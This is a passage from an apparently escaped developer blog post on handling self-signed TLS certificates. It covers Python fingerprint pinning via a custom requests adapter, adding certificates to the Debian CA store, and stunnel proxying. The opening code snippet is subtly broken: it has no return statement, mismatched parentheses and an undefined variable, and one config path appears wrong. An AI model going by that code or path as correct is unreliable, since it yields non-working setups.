&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;create_fingerprint_session&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;netloc&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verify&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;mount&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'https://{}/'&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;FingerprintAdapter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="n"&gt;session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;create_fingerprint_session&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="s"&gt;'https://example.com/a/b/c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'14:71:...'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that the &lt;code&gt;verify&lt;/code&gt; setting must be set to False, otherwise, the &lt;code&gt;requests&lt;/code&gt; library would also try to verify the SSL certificate using the conventional way, by the signature chain and the domain name. &lt;/p&gt;

&lt;p&gt;(Note that the &lt;code&gt;verify&lt;/code&gt; parameter may also be set to a location of a certificate file that contains a concatenated list of trusted certificates in PEM format. However, a self-signed certificate is signed by a custom Certificate Authority (CA), but the certificate of the CA is usually unknown to us. Thus, we do not use this option but set &lt;code&gt;verify&lt;/code&gt; to &lt;code&gt;False&lt;/code&gt;.)&lt;/p&gt;

&lt;p&gt;All that remains now is to implement the &lt;code&gt;FingerprintAdapter&lt;/code&gt;. The quickest way is to subclass &lt;code&gt;HTTPAdapter&lt;/code&gt; class and to modify the methods that create an &lt;code&gt;HTTPPoolConnection&lt;/code&gt; object to include the &lt;code&gt;assert_fingerprint&lt;/code&gt; option:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;requests.adapters&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;FingerprintAdapter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="s"&gt;"""
  A TransportAdapter that allows to verify certificates by fingerprint
  """&lt;/span&gt;
  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;
    &lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;init_poolmanager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;'assert_fingerprint'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;super&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="n"&gt;init_poolmanager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;proxy_manager_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;'assert_fingerprint'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;super&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="n"&gt;proxy_manager_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In summary, set &lt;code&gt;verify=True&lt;/code&gt; when working with certificates signed by a trusted CA, otherwise set &lt;code&gt;verify=False&lt;/code&gt; and mount a &lt;code&gt;FingerprintAdapter&lt;/code&gt; when verifying self-signed certificates by fingerprint. Test that the verification is working by altering the fingerprint value and observing a security error.&lt;/p&gt;

&lt;h2&gt;
  
  
  Method #2: Site-wide
&lt;/h2&gt;

&lt;p&gt;What if you wished to use other tools, besides Python, to query web sites signed with self-signed certificates? A site-wide solution is to add the self-signed certificate to a list of trusted certificates if it's there, no further signature checking will be made by the verifier.&lt;/p&gt;

&lt;p&gt;However, the downside of this method is that a compromised trusted third party could now sign certificates for any domain which all programs on the machine would trust. This is a significant security risk for a long-lived server, but it may be tolerable if "site-wide" does not extend beyond a Docker container which runs a program that only connects to one endpoint.&lt;/p&gt;

&lt;p&gt;The following instructions are for Ubuntu or Debian; for other distributions, make necessary adjustments. &lt;/p&gt;

&lt;p&gt;Look in directory &lt;code&gt;/usr/share/ca-certificates&lt;/code&gt; and you will see the directory &lt;code&gt;mozilla&lt;/code&gt;, with many certificate files inside it. Make your own subdirectory on the same nesting level, for instance, &lt;code&gt;/usr/share/ca-certficates/custom&lt;/code&gt; and put in it self-signed certificates of interest in PEM format, stored as separate files with extension &lt;code&gt;.crt&lt;/code&gt;. Next, edit &lt;code&gt;/var/ca-certificates.conf&lt;/code&gt; and list the custom certificates after the &lt;code&gt;mozilla&lt;/code&gt; certificates. For instance,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...
mozilla/USERTrust_RSA_Certification_Authority.crt
custom/example-com-self-signed.crt
custom/another-example-com-self-signed.crt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, run &lt;code&gt;update-ca-certificates&lt;/code&gt; command. Once that's done, symlinks to your certificates would appear in &lt;code&gt;/etc/ssl/certs&lt;/code&gt; directory. At this point, the &lt;code&gt;curl&lt;/code&gt; tool would work to accept the self-signed certificate from &lt;code&gt;example.com&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;However, the fingerprint method described previously, had the advantage that it worked even if there was a domain name mismatch. A mismatch would happen if you queried the target HTTPs server by an IP address (e.g.&lt;code&gt;https://1.2.3.4/a/b/&lt;/code&gt;). If this is your situation, you can add an entry to &lt;code&gt;/etc/hosts&lt;/code&gt; file to query the web server using the precise domain name that is listed inside the self-signed certificate.&lt;/p&gt;

&lt;p&gt;The side-wide method works for all tools that rely on the &lt;code&gt;libopenssl&lt;/code&gt; library, which includes &lt;code&gt;curl&lt;/code&gt;. However, it is not sufficient for Python's &lt;code&gt;requests&lt;/code&gt; library since it does some of its own checking of certificates.&lt;/p&gt;

&lt;h2&gt;
  
  
  Method #3: Strip SSL
&lt;/h2&gt;

&lt;p&gt;Another way to allow a variety of tools to access HTTPs websites signed by self-signed certificates is to access them through a trusted &lt;em&gt;proxy&lt;/em&gt; server that would strip the SSL after verifying the legitimacy of the self-signed certificates using fingerprints. We could implement such a proxy server in Python using the techniques above. Alternatively, we could use a utility program called &lt;code&gt;stunnel&lt;/code&gt; that stands for the "Universal SSL Tunnel."&lt;/p&gt;

&lt;p&gt;First, prepare a &lt;code&gt;connection.conf&lt;/code&gt; configuration file like this one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pid = /var/run/stunnel1.pid
CApath = /etc/ssl/certs
foreground=yes

[connection1]
verifyChain=no
verifyPeer=yes
client=yes
accept=8081
connect=1.2.3.4:443
sni=example.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then, run &lt;code&gt;stunnel&lt;/code&gt; with the configuration file as the argument to have &lt;code&gt;https://example.com&lt;/code&gt; proxied as &lt;code&gt;http://localhost:8081&lt;/code&gt;,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;stunnel connection.conf &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp; output.log &amp;amp;
&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="s1"&gt;'http://localhost:8081/a/b/c'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An important thing to notice in the example configuration file is the &lt;code&gt;verifyChain&lt;/code&gt; and &lt;code&gt;verifyPeer&lt;/code&gt; options. They combine to verify the certificate by a fingerprint only and would ignore an incomplete signature chain. These options were added to &lt;code&gt;stunnel&lt;/code&gt; in July 2016, in version 5.34. Another thing to notice that the domain name doesn't matter. The &lt;code&gt;sni&lt;/code&gt; parameter is used only to instruct the webserver which virtual host you are interested in, but it plays no role in validating the certificate. &lt;/p&gt;

&lt;p&gt;To run &lt;code&gt;stunnel&lt;/code&gt; site-wide make the following configuration changes: store the configuration as &lt;code&gt;/etc/stunnel/stunnel.conf&lt;/code&gt;, remove the &lt;code&gt;foreground=yes&lt;/code&gt; bit, set &lt;code&gt;pid&lt;/code&gt; to &lt;code&gt;/var/run/stunnel.pid&lt;/code&gt; and add additional connection sections as needed. &lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;We have demonstrated three ways to work with self-signed certificates without compromising security. At Smarking, we are trusted by vendors of parking systems to protect their data, and we use such techniques to justify their trust.&lt;/p&gt;

&lt;p&gt;To learn more about Smarking, visit &lt;a href="https://www.smarking.com/"&gt;www.smarking.com&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>security</category>
      <category>python</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
